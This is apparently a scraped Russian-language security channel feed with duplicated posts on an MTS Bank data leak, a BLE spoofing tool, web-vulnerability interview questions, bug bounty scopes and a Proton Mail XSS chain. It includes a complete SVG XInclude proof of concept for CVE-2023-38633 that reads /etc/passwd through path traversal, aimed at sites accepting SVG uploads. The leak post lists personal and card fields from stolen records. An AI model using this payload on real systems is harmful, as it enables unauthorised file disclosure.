Утечка МТС Банк с собственной командой безопасности, которая "действует быстрее, чем злоумышленники".
В архиве 3 файла:
— ФИО
— гражданство
— пол
— дата рождения
— номер телефона
— email
Кроме привычных данных, которые мы видим в каждой утечке, в файле
— имя владельца
— маскированный PAN
— дата выдачи
— дата окончания срока действия
— тип карты
Прошлые утечки:
— Литрес
— Сколково
— BreachForums
В архиве 3 файла:
main, contacts и cards. В каждом около 1кк строк со следующими данными:— ФИО
— гражданство
— пол
— дата рождения
— номер телефона
Кроме привычных данных, которые мы видим в каждой утечке, в файле
cards собрана информация о выпущенных картах:— имя владельца
— маскированный PAN
— дата выдачи
— дата окончания срока действия
— тип карты
Прошлые утечки:
— Литрес
— Сколково
— BreachForums
https://github.com/ECTO-1A/AppleJuice
Несколько участников хакерской конференции Def Con сообщили, что у них на смартфонах появлялись загадочные и настойчивые всплывающие окна с предложениями использовать Apple ID для подключения к Apple TV и поделиться паролем.
Утилита для спуфинга Apple BLE Proximity Pairing Messages и отправки сообщений всем айфонам, находящимся в округе.
Несколько участников хакерской конференции Def Con сообщили, что у них на смартфонах появлялись загадочные и настойчивые всплывающие окна с предложениями использовать Apple ID для подключения к Apple TV и поделиться паролем.
Утилита для спуфинга Apple BLE Proximity Pairing Messages и отправки сообщений всем айфонам, находящимся в округе.
GitHub
GitHub - ECTO-1A/AppleJuice: Apple BLE proximity pairing message spoofing
Apple BLE proximity pairing message spoofing. Contribute to ECTO-1A/AppleJuice development by creating an account on GitHub.
33 вопроса о веб-уязвимостях для подготовки к собеседованию. Сложность — средняя, некоторые вопросы с подвохом. Если смогли ответить на большую часть без подсказок, — можете смело идти и получать свой оффер.
1. В чем разница между Web Cache Deception и Web Cache Poisoning?
2. Какие два критерия должны быть соблюдены для эксплуатации Session Fixation?
3. В чем разница между Base64- и Base64URL-кодированием?
4. Назовите 5 (или более типов) XSS.
5. Как работает булевое
6. Что такое Same-Origin Policy (SOP) и как это работает?
7. Как работает TE.TE вариант HTTP Request Smuggling?
8. Что такое DOM Clobbering и как его можно использовать для обхода некоторых санитайзеров при эксплуатации XSS?
9. Опишите, как можно использовать HTTP Parameter Pollution для обхода WAF.
10. Опишите, что такое IDOR и объясните, чем его устранение отличается от устранения других уязвимостей контроля доступа.
11. Что такое JWK и JKU, и чем они отличаются?
12. Что такое бизнес-логика в контексте веб-приложений и чем тестирование уязвимостей бизнес-логики отличается от поиска XSS, SQLi и т. д.?
13. Приведите пример 3 пэйлоадов, которые можно использовать для идентификации используемого Template Processor при эксплуатации SSTI.
14. Зачем нужен заголовок Sec-WebSocket-Key?
15. Что позволяет сделать значение unsafe-inline, если оно используется в директиве script-src?
16. Приведите пример аутентификации без сохранения состояния и опишите уязвимость этого механизма аутентификации.
17. Опишите три способа предотвращения CSRF.
18. Что такое XML parameter entities и какие ограничения они имеют при эксплуатации XXE?
19. Какие рекомендации вы бы дали клиенту по исправлению DOM Based XSS?
20. Какие условия должны быть выполнены, чтобы "предотвратить" отправку Preflight-запроса браузером?
21. Опишите три способа эксплуатации Insecure Deserialization.
22. Перечислите проверки, которые может выполнять приложение, чтобы убедиться, что файлы не содержат вредоносного содержимого и могут быть загружены только в разрешенные каталоги.
23. Как работает Mass Assignment и каковы возможные последствия использования такой уязвимости?
24. Что такое GraphQL batching и как его использование может помочь обойти Rate Limit?
25. Что такое type juggling и как JSON помогает эксплуатировать уязвимости этого типа?
26. Опишите три метода, которые можно использовать для обнаружения конфиденциальных данных, предоставляемых приложением.
27. Опишите атрибуты запроса, которые делают его фактически невосприимчивым к CSRF.
28. Назовите 5 уязвимостей, которые потенциально могут привести к OS command execution в веб-приложении.
29. Что такое Prototype Pollution и к каким последствиям может привести эксплуатации в клиентском и в серверном вариантах?
30. Опишите, как вы будете тестировать уязвимости вертикального контроля доступа в приложении с 20 ролями и более чем 300 различными «функциональными» запросами.
31. При каких обстоятельствах сохраняется инстанс Session Storage у вкладки?
32. Как еще можно найти и эксплуатировать XXE, кроме загрузки XML через форму?
33. Назовите распространенные уязвимости, которые можно обнаружить при сбросе пароля.
1. В чем разница между Web Cache Deception и Web Cache Poisoning?
2. Какие два критерия должны быть соблюдены для эксплуатации Session Fixation?
3. В чем разница между Base64- и Base64URL-кодированием?
4. Назовите 5 (или более типов) XSS.
5. Как работает булевое
"Error" при эксплуатации Blind SQL Injection?6. Что такое Same-Origin Policy (SOP) и как это работает?
7. Как работает TE.TE вариант HTTP Request Smuggling?
8. Что такое DOM Clobbering и как его можно использовать для обхода некоторых санитайзеров при эксплуатации XSS?
9. Опишите, как можно использовать HTTP Parameter Pollution для обхода WAF.
10. Опишите, что такое IDOR и объясните, чем его устранение отличается от устранения других уязвимостей контроля доступа.
11. Что такое JWK и JKU, и чем они отличаются?
12. Что такое бизнес-логика в контексте веб-приложений и чем тестирование уязвимостей бизнес-логики отличается от поиска XSS, SQLi и т. д.?
13. Приведите пример 3 пэйлоадов, которые можно использовать для идентификации используемого Template Processor при эксплуатации SSTI.
14. Зачем нужен заголовок Sec-WebSocket-Key?
15. Что позволяет сделать значение unsafe-inline, если оно используется в директиве script-src?
16. Приведите пример аутентификации без сохранения состояния и опишите уязвимость этого механизма аутентификации.
17. Опишите три способа предотвращения CSRF.
18. Что такое XML parameter entities и какие ограничения они имеют при эксплуатации XXE?
19. Какие рекомендации вы бы дали клиенту по исправлению DOM Based XSS?
20. Какие условия должны быть выполнены, чтобы "предотвратить" отправку Preflight-запроса браузером?
21. Опишите три способа эксплуатации Insecure Deserialization.
22. Перечислите проверки, которые может выполнять приложение, чтобы убедиться, что файлы не содержат вредоносного содержимого и могут быть загружены только в разрешенные каталоги.
23. Как работает Mass Assignment и каковы возможные последствия использования такой уязвимости?
24. Что такое GraphQL batching и как его использование может помочь обойти Rate Limit?
25. Что такое type juggling и как JSON помогает эксплуатировать уязвимости этого типа?
26. Опишите три метода, которые можно использовать для обнаружения конфиденциальных данных, предоставляемых приложением.
27. Опишите атрибуты запроса, которые делают его фактически невосприимчивым к CSRF.
28. Назовите 5 уязвимостей, которые потенциально могут привести к OS command execution в веб-приложении.
29. Что такое Prototype Pollution и к каким последствиям может привести эксплуатации в клиентском и в серверном вариантах?
30. Опишите, как вы будете тестировать уязвимости вертикального контроля доступа в приложении с 20 ролями и более чем 300 различными «функциональными» запросами.
31. При каких обстоятельствах сохраняется инстанс Session Storage у вкладки?
32. Как еще можно найти и эксплуатировать XXE, кроме загрузки XML через форму?
33. Назовите распространенные уязвимости, которые можно обнаружить при сбросе пароля.
https://github.com/hahwul/noir
Attack Surface Detector — утилита для составления поверхности атаки на основе сканирования исходного кода.
Умеет:
— определять язык и фреймворк, на которых написано приложение
— находить все эндпоинты, параметры, методы, заголовки и веб-страницы на основе анализа исходников
— экспортировать результаты для импорта в Owasp ZAP, BurpSuite, Caido.
Поддерживает фреймворки на Java, Javascript, Ruby и Python: Echo, Gin, Django, Flask, Rails, Sinatra, Spring, Kemal, Express.
Attack Surface Detector — утилита для составления поверхности атаки на основе сканирования исходного кода.
Умеет:
— определять язык и фреймворк, на которых написано приложение
— находить все эндпоинты, параметры, методы, заголовки и веб-страницы на основе анализа исходников
— экспортировать результаты для импорта в Owasp ZAP, BurpSuite, Caido.
Поддерживает фреймворки на Java, Javascript, Ruby и Python: Echo, Gin, Django, Flask, Rails, Sinatra, Spring, Kemal, Express.
https://www.youtube.com/watch?v=gt9YaeWzbpc
Cracking the final frontier: Reverse engineering and exploiting low-earth orbit satellites
Cracking the final frontier: Reverse engineering and exploiting low-earth orbit satellites
YouTube
Johannes Willbold - Cracking the final frontier: Reverse engineering and exploiting LEO satellites
This talk presents a comprehensive security analysis of low-earth satellites, which have gained immense popularity in the "New Space" era. Despite their growing numbers, the security of these satellites remains uncertain. After introducing the essential architectural…
https://github.com/arkadiyt/bounty-targets-data
Репозиторий со всеми скоупами с Bug Bounty площадок:
— Bugcrowd
— Hackerone
— Intigriti
— YesWeHack
— Hackenproof
— Federacy
Использую сам, чтобы запускать регулярные сканы. Данные в json, обновляются каждые полчаса.
Репозиторий со всеми скоупами с Bug Bounty площадок:
— Bugcrowd
— Hackerone
— Intigriti
— YesWeHack
— Hackenproof
— Federacy
Использую сам, чтобы запускать регулярные сканы. Данные в json, обновляются каждые полчаса.
GitHub
GitHub - arkadiyt/bounty-targets-data: This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hacker…
This repo contains hourly-updated data dumps of bug bounty platform scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for reports - arkadiyt/bounty-targets-data
https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/
PoC для CVE-2023-38633. Если удалось обнаружить, что сайт разрешает загрузку SVG-файлов, стоит попробовать проэксплуатировать недавно найденную CVE в пакете librsvg.
Из-за особенностей обработки строк с символами
PoC для CVE-2023-38633. Если удалось обнаружить, что сайт разрешает загрузку SVG-файлов, стоит попробовать проэксплуатировать недавно найденную CVE в пакете librsvg.
Из-за особенностей обработки строк с символами
"#" и "?", парсеры считают безопасным пэйлоад .?../../../../../../../etc/passwd, а в полученном SVG возвращается содержимое указанного /etc/passwd.<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,204,204);" />
<text x="0" y="100">
<xi:include href=".?../../../../../../../etc/passwd" parse="text" encoding="ASCII">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
Работает до версии 2.56.3.https://github.com/johnnykv/heralding/
Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot!
Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5.
Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot!
Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5.
GitHub
GitHub - johnnykv/heralding: Credentials catching honeypot
Credentials catching honeypot. Contribute to johnnykv/heralding development by creating an account on GitHub.
https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/
Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.
Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега
2. Побег из Sandbox Iframe из-за атрибута allow-scripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.
Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
— прочитать ее электронные письма расшифрованном виде
— отправить электронные письма от её имени
— украсть криптографические ключи.
Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.
Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега
<style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.2. Побег из Sandbox Iframe из-за атрибута allow-scripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.
Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
— прочитать ее электронные письма расшифрованном виде
— отправить электронные письма от её имени
— украсть криптографические ключи.
Sonarsource
Code Vulnerabilities Put Proton Mails at Risk
The Sonar Research team discovered critical code vulnerabilities in Proton Mail, Skiff and Tutanota. This post covers the technical details of the XSS vulnerability in Proton Mail.
API Security Academy by Escape.tech
API Security Academy — это бесплатная коллекция интерактивных заданий, которые научат вас атаковать и защищать приложения, использующие GraphQL.
Академия предоставляет подробные уроки, из которых вы узнаете о различных уязвимостях и передовых методах обеспечения защиты GraphQL.
Каждый урок предоставляет работающее веб-приложение с GraphQL, поэтому вы не только поймете, почему уязвимость опасна, но и как ее использовать и, самое главное, как ее исправить.
Уже сейчас есть можно пройти:
— Prevent Mutation Brute-Force Attacks
— Implement Object-Level Authorization
— Disable Debug Mode for Production
— Combat SQL Injections
— Limit Query Complexity
— Implement Field-Level Authorization
— Configure HTTP Headers for User Protection
— Validate JSON Inputs
Скоро появятся:
— Mitigate Server Side Request Forgery
— Implement Rate-Limiting for Bot Deterrence
— Abort Expensive Queries for Protection
На старте был отдан приоритет GraphQL, но разработчики обещают и другие типы API.
API Security Academy — это бесплатная коллекция интерактивных заданий, которые научат вас атаковать и защищать приложения, использующие GraphQL.
Академия предоставляет подробные уроки, из которых вы узнаете о различных уязвимостях и передовых методах обеспечения защиты GraphQL.
Каждый урок предоставляет работающее веб-приложение с GraphQL, поэтому вы не только поймете, почему уязвимость опасна, но и как ее использовать и, самое главное, как ее исправить.
Уже сейчас есть можно пройти:
— Prevent Mutation Brute-Force Attacks
— Implement Object-Level Authorization
— Disable Debug Mode for Production
— Combat SQL Injections
— Limit Query Complexity
— Implement Field-Level Authorization
— Configure HTTP Headers for User Protection
— Validate JSON Inputs
Скоро появятся:
— Mitigate Server Side Request Forgery
— Implement Rate-Limiting for Bot Deterrence
— Abort Expensive Queries for Protection
На старте был отдан приоритет GraphQL, но разработчики обещают и другие типы API.